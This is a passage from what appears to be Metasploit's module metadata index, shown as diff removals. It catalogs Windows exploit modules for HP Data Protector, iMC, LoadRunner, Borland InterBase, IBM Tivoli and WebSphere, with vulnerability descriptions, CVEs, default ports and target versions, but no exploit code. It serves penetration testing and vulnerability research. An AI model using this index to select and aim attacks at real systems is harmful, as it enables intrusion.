This module has been tested\n successfully on HP Data Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.", - "references": [ - "CVE-2013-6194", - "OSVDB-101630", - "BID-64647", - "ZDI-14-003", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector 6.20 build 370 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_dataprotector_traversal.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_dataprotector_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/hp_imc_dbman_restartdb_unauth_rce": { - "name": "HPE iMC dbman RestartDB Unauthenticated RCE", - "fullname": "exploit/windows/misc/hp_imc_dbman_restartdb_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "sztivi", - "Chris Lyne", - "bcoles " - ], - "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restart\n a user-specified database instance (OpCode 10008), however the\n instance ID is not sanitized, allowing execution of arbitrary\n operating system commands as SYSTEM. 
This service listens on\n TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", - "references": [ - "CVE-2017-5816", - "EDB-43198", - "ZDI-17-340", - "BID-98469", - "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" - ], - "platform": "Windows", - "arch": "", - "rport": 2810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_dbman_restartdb_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_dbman_restartdb_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_imc_dbman_restoredbase_unauth_rce": { - "name": "HPE iMC dbman RestoreDBase Unauthenticated RCE", - "fullname": "exploit/windows/misc/hp_imc_dbman_restoredbase_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2017-05-15", - "type": "exploit", - "author": [ - "sztivi", - "Chris Lyne", - "bcoles " - ], - "description": "This module exploits a remote command execution vulnerablity in\n Hewlett Packard Enterprise Intelligent Management Center before\n version 7.3 E0504P04.\n\n The dbman service allows unauthenticated remote users to restore\n a user-specified database (OpCode 10007), however the database\n connection username is not sanitized resulting in command injection,\n allowing execution of arbitrary operating system commands as SYSTEM.\n This service listens on TCP port 2810 by default.\n\n This module has been tested successfully on iMC PLAT v7.2 (E0403)\n on Windows 7 SP1 (EN).", - "references": [ - "CVE-2017-5817", - "EDB-43195", - "ZDI-17-341", - "BID-98469", - "URL-https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03745en_us" - ], - "platform": "Windows", - "arch": "", - 
"rport": 2810, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_dbman_restoredbase_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_dbman_restoredbase_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_imc_uam": { - "name": "HP Intelligent Management Center UAM Buffer Overflow", - "fullname": "exploit/windows/misc/hp_imc_uam", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-08-29", - "type": "exploit", - "author": [ - "e6af8de8b1d4b2b6d5ba2610cbf9cd38", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a remote buffer overflow in HP Intelligent Management Center\n UAM. The vulnerability exists in the uam.exe component, when using sprint in a\n insecure way for logging purposes. The vulnerability can be triggered by sending a\n malformed packet to the 1811/UDP port. 
The module has been successfully tested on\n HP iMC 5.0 E0101 and UAM 5.0 E0102 over Windows Server 2003 SP2 (DEP bypass).", - "references": [ - "CVE-2012-3274", - "OSVDB-85060", - "BID-55271", - "ZDI-12-171", - "URL-https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03589863" - ], - "platform": "Windows", - "arch": "", - "rport": 1811, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP iMC 5.0 E0101 / UAM 5.0 E0102 on Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_imc_uam.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_imc_uam", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_loadrunner_magentproc": { - "name": "HP LoadRunner magentproc.exe Overflow", - "fullname": "exploit/windows/misc/hp_loadrunner_magentproc", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-07-27", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The\n vulnerability exists on the LoadRunner Agent Process magentproc.exe. 
By sending\n a specially crafted packet, an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2013-4800", - "OSVDB-95644", - "ZDI-13-169" - ], - "platform": "Windows", - "arch": "", - "rport": 443, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 / HP LoadRunner 11.50" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_loadrunner_magentproc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_loadrunner_magentproc_cmdexec": { - "name": "HP Mercury LoadRunner Agent magentproc.exe Remote Command Execution", - "fullname": "exploit/windows/misc/hp_loadrunner_magentproc_cmdexec", - "aliases": [], - "rank": 600, - "disclosure_date": "2010-05-06", - "type": "exploit", - "author": [ - "Unknown", - "aushack " - ], - "description": "This module exploits a remote command execution vulnerablity in HP LoadRunner before 9.50\n and also HP Performance Center before 9.50. 
HP LoadRunner 12.53 and other versions are\n also most likely vulneable if the (non-default) SSL option is turned off.\n By sending a specially crafted packet, an attacker can execute commands remotely.\n The service is vulnerable provided the Secure Channel feature is disabled (default).", - "references": [ - "CVE-2010-1549", - "ZDI-10-080", - "BID-39965", - "URL-https://support.hpe.com/hpsc/doc/public/display?docId=c00912968" - ], - "platform": "Windows", - "arch": "", - "rport": 54345, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows (Dropper)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_loadrunner_magentproc_cmdexec.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_loadrunner_magentproc_cmdexec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_magentservice": { - "name": "HP Diagnostics Server magentservice.exe Overflow", - "fullname": "exploit/windows/misc/hp_magentservice", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-01-12", - "type": "exploit", - "author": [ - "AbdulAziz Hariri", - "hal" - ], - "description": "This module exploits a stack buffer overflow in HP Diagnostics Server\n magentservice.exe service. By sending a specially crafted packet, an attacker\n may be able to execute arbitrary code. 
Originally found and posted by\n AbdulAziz Harir via ZDI.", - "references": [ - "OSVDB-72815", - "CVE-2011-4789", - "ZDI-12-016" - ], - "platform": "Windows", - "arch": "", - "rport": 23472, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Diagnostics Server 9.10" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_magentservice.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_magentservice", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_1": { - "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_1", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-17", - "type": "exploit", - "author": [ - "EgiX ", - "Fairuzan Roslan ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the first one.", - "references": [ - "CVE-2007-2280", - "BID-37396", - "OSVDB-61206", - "ZDI-09-099" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", - "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", - "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", - "HP Application Recovery Manager software A.06.10: INET, internal build 282" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_1.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_1", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_2": { - "name": "HP OmniInet.exe MSG_PROTOCOL Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_2", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-12-17", - "type": "exploit", - "author": [ - "EgiX ", - "Fairuzan Roslan ", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in the Hewlett-Packard\n OmniInet NT Service. By sending a specially crafted MSG_PROTOCOL (0x010b)\n packet, a remote attacker may be able to execute arbitrary code with elevated\n privileges.\n\n This service is installed with HP OpenView Data Protector, HP Application\n Recovery Manager and potentially other products. This exploit has been tested\n against versions 6.1, 6.0, and 5.50 of Data Protector. and versions 6.0 and 6.1\n of Application Recovery Manager.\n\n NOTE: There are actually two consecutive wcscpy() calls in the program (which\n may be why ZDI considered them two separate issues). 
However, this module only\n exploits the second one.", - "references": [ - "CVE-2009-3844", - "BID-37250", - "OSVDB-60852", - "ZDI-09-091" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic Targeting", - "HP OpenView Storage Data Protector A.05.50: INET, internal build 330", - "HP OpenView Storage Data Protector A.06.00: INET, internal build 331", - "HP StorageWorks Application Recovery Manager A.06.00: INET, internal build 81", - "HP Application Recovery Manager software A.06.10: INET, internal build 282" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_2.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_2", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_3": { - "name": "HP OmniInet.exe Opcode 27 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_3", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-06-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in the Hewlett-Packard\n OmniInet NT Service. 
By sending a specially crafted opcode 27 packet,\n a remote attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2011-1865", - "OSVDB-73571", - "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector A.06.10 Build 611 / A.06.11 Build 243" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_3.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_3", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_omniinet_4": { - "name": "HP OmniInet.exe Opcode 20 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_omniinet_4", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-06-29", - "type": "exploit", - "author": [ - "Oren Isacson", - "muts", - "dookie", - "sinn3r ", - "corelanc0d3r " - ], - "description": "This module exploits a vulnerability found in HP Data Protector's OmniInet\n process. By supplying a long string of data as the file path with opcode '20',\n a buffer overflow can occur when this data is being written on the stack where\n no proper bounds checking is done beforehand, which results arbitrary code\n execution under the context of SYSTEM. 
This module is also made against systems\n such as Windows Server 2003 or Windows Server 2008 that have DEP and/or ASLR\n enabled by default.", - "references": [ - "CVE-2011-1865", - "OSVDB-73571", - "EDB-17468", - "URL-http://www.coresecurity.com/content/HP-Data-Protector-multiple-vulnerabilities", - "URL-http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02872182" - ], - "platform": "Windows", - "arch": "", - "rport": 5555, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Data Protector A.06.10 b611 / A.06.11 b243 XP SP3/Win2003/Win2008" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_omniinet_4.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_omniinet_4", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_operations_agent_coda_34": { - "name": "HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow", - "fullname": "exploit/windows/misc/hp_operations_agent_coda_34", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x34 opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. 
On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", - "references": [ - "CVE-2012-2019", - "OSVDB-83673", - "BID-54362", - "ZDI-12-114" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Operations Agent 11.00 / Windows XP SP3", - "HP Operations Agent 11.00 / Windows 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_operations_agent_coda_34", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_operations_agent_coda_8c": { - "name": "HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow", - "fullname": "exploit/windows/misc/hp_operations_agent_coda_8c", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-09", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability in HP Operations Agent for\n Windows. The vulnerability exists in the HP Software Performance Core Program\n component (coda.exe) when parsing requests for the 0x8c opcode. This module has\n been tested successfully on HP Operations Agent 11.00 over Windows XP SP3 and\n Windows 2003 SP2 (DEP bypass).\n\n The coda.exe components runs only for localhost by default, network access must be\n granted through its configuration to be remotely exploitable. 
On the other hand it\n runs on a random TCP port, to make easier reconnaissance a check function is\n provided.", - "references": [ - "CVE-2012-2020", - "OSVDB-83674", - "BID-54362", - "ZDI-12-115" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "HP Operations Agent 11.00 / Windows XP SP3", - "HP Operations Agent 11.00 / Windows 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_operations_agent_coda_8c", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hp_ovtrace": { - "name": "HP OpenView Operations OVTrace Buffer Overflow", - "fullname": "exploit/windows/misc/hp_ovtrace", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-08-09", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in HP OpenView Operations version A.07.50.\n By sending a specially crafted packet, a remote attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2007-3872", - "OSVDB-39527", - "BID-25255" - ], - "platform": "Windows", - "arch": "", - "rport": 5051, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Advanced Server All English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hp_ovtrace.rb", - "is_install_path": true, - "ref_name": "windows/misc/hp_ovtrace", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/hta_server": { - "name": "HTA Web Server", - "fullname": "exploit/windows/misc/hta_server", - "aliases": [], - "rank": 0, - "disclosure_date": "2016-10-06", - "type": 
"exploit", - "author": [ - "Spencer McIntyre" - ], - "description": "This module hosts an HTML Application (HTA) that when opened will run a\n payload via Powershell. When a user navigates to the HTA file they will\n be prompted by IE twice before the payload is executed.", - "references": [ - "URL-https://www.trustedsec.com/july-2015/malicious-htas/" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Powershell x86", - "Powershell x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/hta_server.rb", - "is_install_path": true, - "ref_name": "windows/misc/hta_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "SideEffects": [ - "screen-effects" - ], - "Stability": [ - "crash-safe" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_isc_attach_database": { - "name": "Borland InterBase isc_attach_database() Buffer Overflow", - "fullname": "exploit/windows/misc/ib_isc_attach_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38607", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase 
WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_isc_attach_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_isc_attach_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_isc_create_database": { - "name": "Borland InterBase isc_create_database() Buffer Overflow", - "fullname": "exploit/windows/misc/ib_isc_create_database", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted create request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38606", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_isc_create_database.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_isc_create_database", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ib_svc_attach": { - "name": "Borland InterBase SVC_attach() Buffer Overflow", - "fullname": 
"exploit/windows/misc/ib_svc_attach", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-10-03", - "type": "exploit", - "author": [ - "Ramon de C Valle ", - "Adriano Lima " - ], - "description": "This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.", - "references": [ - "CVE-2007-5243", - "OSVDB-38605", - "BID-25917", - "URL-http://www.risesecurity.org/advisories/RISE-2007002.txt" - ], - "platform": "Windows", - "arch": "x86", - "rport": 3050, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Brute Force", - "Borland InterBase WI-V8.1.0.257", - "Borland InterBase WI-V8.0.0.123", - "Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80", - "Borland InterBase WI-V7.0.1.1", - "Borland InterBase WI-V6.5.0.28", - "Borland InterBase WI-V6.0.1.6", - "Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0", - "Borland InterBase WI-V5.5.0.742", - "Borland InterBase WI-V5.1.1.680", - "Debug" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ib_svc_attach.rb", - "is_install_path": true, - "ref_name": "windows/misc/ib_svc_attach", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_cognos_tm1admsd_bof": { - "name": "IBM Cognos tm1admsd.exe Overflow", - "fullname": "exploit/windows/misc/ibm_cognos_tm1admsd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-02", - "type": "exploit", - "author": [ - "Unknown", - "juan vazquez " - ], - "description": "This module exploits a stack buffer overflow in IBM Cognos Analytic Server\n Admin service. The vulnerability exists in the tm1admsd.exe component, due to a\n dangerous copy of user controlled data to the stack, via memcpy, without validating\n the supplied length and data. 
The module has been tested successfully on IBM Cognos\n Express 9.5 over Windows XP SP3.", - "references": [ - "CVE-2012-0202", - "OSVDB-80876", - "BID-52847", - "ZDI-12-101", - "URL-http://www-01.ibm.com/support/docview.wss?uid=swg21590314" - ], - "platform": "Windows", - "arch": "", - "rport": 5498, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Cognos Express 9.5 / Windows XP SP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_cognos_tm1admsd_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_director_cim_dllinject": { - "name": "IBM System Director Agent DLL Injection", - "fullname": "exploit/windows/misc/ibm_director_cim_dllinject", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-03-10", - "type": "exploit", - "author": [ - "Bernhard Mueller", - "kingcope", - "juan vazquez " - ], - "description": "This module abuses the \"wmicimsv\" service on IBM System Director Agent 5.20.3\n to accomplish arbitrary DLL injection and execute arbitrary code with SYSTEM\n privileges.\n\n In order to accomplish remote DLL injection it uses a WebDAV service as disclosed\n by kingcope on December 2012. Because of this, the target host must have the\n WebClient service (WebDAV Mini-Redirector) enabled. 
It is enabled and automatically\n started by default on Windows XP SP3, but disabled by default on Windows 2003 SP2.", - "references": [ - "CVE-2009-0880", - "OSVDB-52616", - "OSVDB-88102", - "BID-34065", - "URL-https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20090305-2_IBM_director_privilege_escalation.txt", - "URL-https://seclists.org/bugtraq/2012/Dec/5" - ], - "platform": "Windows", - "arch": "", - "rport": 6988, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "IBM System Director Agent 5.20.3 / Windows with WebClient enabled" - ], - "mod_time": "2018-09-15 18:54:45 +0000", - "path": "/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_director_cim_dllinject", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_tsm_cad_ping": { - "name": "IBM Tivoli Storage Manager Express CAD Service Buffer Overflow", - "fullname": "exploit/windows/misc/ibm_tsm_cad_ping", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service.\n By sending a \"ping\" packet containing a long string, an attacker can execute arbitrary code.\n\n NOTE: the dsmcad.exe service must be in a particular state (CadWaitingStatus = 1) in order\n for the vulnerable code to be reached. This state doesn't appear to be reachable when the\n TSM server is not running. 
This service does not restart.", - "references": [ - "CVE-2009-3853", - "OSVDB-59632" - ], - "platform": "Windows", - "arch": "", - "rport": 1582, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager Express 5.3.6.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_tsm_cad_ping", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_tsm_rca_dicugetidentify": { - "name": "IBM Tivoli Storage Manager Express RCA Service Buffer Overflow", - "fullname": "exploit/windows/misc/ibm_tsm_rca_dicugetidentify", - "aliases": [], - "rank": 500, - "disclosure_date": "2009-11-04", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express Remote\n Client Agent service. By sending a \"dicuGetIdentify\" request packet containing a long\n NodeName parameter, an attacker can execute arbitrary code.\n\n NOTE: this exploit first connects to the CAD service to start the RCA service and obtain\n the port number on which it runs. 
This service does not restart.", - "references": [ - "CVE-2008-4828", - "OSVDB-54232", - "BID-34803" - ], - "platform": "Windows", - "arch": "", - "rport": 1582, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "IBM Tivoli Storage Manager Express 5.3.6.2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb", - "is_install_path": true, - "ref_name": "windows/misc/ibm_tsm_rca_dicugetidentify", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ibm_websphere_java_deserialize": { - "name": "IBM WebSphere RCE Java Deserialization Vulnerability", - "fullname": "exploit/windows/misc/ibm_websphere_java_deserialize", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-11-06", - "type": "exploit", - "author": [ - "Liatsis Fotios " - ], - "description": "This module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization\n call of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows\n remote arbitrary code execution. 
